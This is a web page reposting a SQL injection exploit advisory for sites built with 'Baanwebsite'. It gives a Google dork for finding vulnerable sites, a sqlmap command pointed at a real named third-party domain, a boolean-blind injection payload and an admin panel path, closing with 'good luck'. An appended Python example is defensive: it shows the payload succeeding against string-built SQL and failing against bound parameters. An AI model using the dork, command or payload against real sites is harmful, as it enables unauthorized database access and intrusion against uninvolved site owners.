Information Exploit
[+] Exploit Title: Baanwebsite SQL Injection Vulnerability
[+] Author : Cxsecurity.com and Magelang1337
[+] Dork : inurl:/php.?id= "Powered by บ้านเว็บไซต์"
[+] Tested on : BackBox 5.1, Chrome
On Target :
[+] SQLMAP Poc :
sqlmap -u "http://www.onlinesolution.co.th/news/view.php?id=17" --dbs
[+] Poc SQL Injection :
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9007=9007 AND 'pOJG'='pOJG
[+] Poc local Admin : /admin
Source of the bug/exploit : [https://cxsecurity.com/issue/WLB-2018050129]
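An added example, not part of the original advisory: the payload quoted above is run against a constructed in-memory SQLite table to show why string-built SQL lets it rewrite the WHERE clause, while a bound parameter and integer validation treat it as plain data. The `news` table, its columns and the three `view_*` functions are assumptions standing in for the site's `view.php` code, which the page does not show.

```python
import sqlite3

# Payload value quoted on this page (sqlmap's boolean-based blind finding).
PAGE_PAYLOAD = "1' AND 9007=9007 AND 'pOJG'='pOJG"


def make_db():
    """Constructed stand-in for the site's database (table and columns are assumptions)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?)",
                   [(1, "First item"), (17, "Seventeenth item")])
    return db


def view_vulnerable(db, raw_id):
    """Assumed shape of the flawed query: the parameter is pasted into the SQL text."""
    sql = "SELECT title FROM news WHERE id = '" + raw_id + "'"
    return db.execute(sql).fetchone()


def view_parameterized(db, raw_id):
    """Bound parameter: the whole value is compared as data, never parsed as SQL."""
    return db.execute("SELECT title FROM news WHERE id = ?", (raw_id,)).fetchone()


def view_validated(db, raw_id):
    """Defense in depth: accept only a short run of ASCII digits, then bind it."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return None  # reject the request; worth logging as a probable probe
    return db.execute("SELECT title FROM news WHERE id = ?", (int(raw_id),)).fetchone()


if __name__ == "__main__":
    db = make_db()
    for fn in (view_vulnerable, view_parameterized, view_validated):
        print(fn.__name__, "| normal:", fn(db, "17"), "| payload:", fn(db, PAGE_PAYLOAD))
```

Only the concatenating version returns a row for the payload, because the quote characters end the string literal and the rest is evaluated as SQL conditions.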
good luck.. and hopefully useful...
2 Comments
Nice post....Thanks for sharing the article....
Thank you, bro, for the info, which is really very helpful ^.^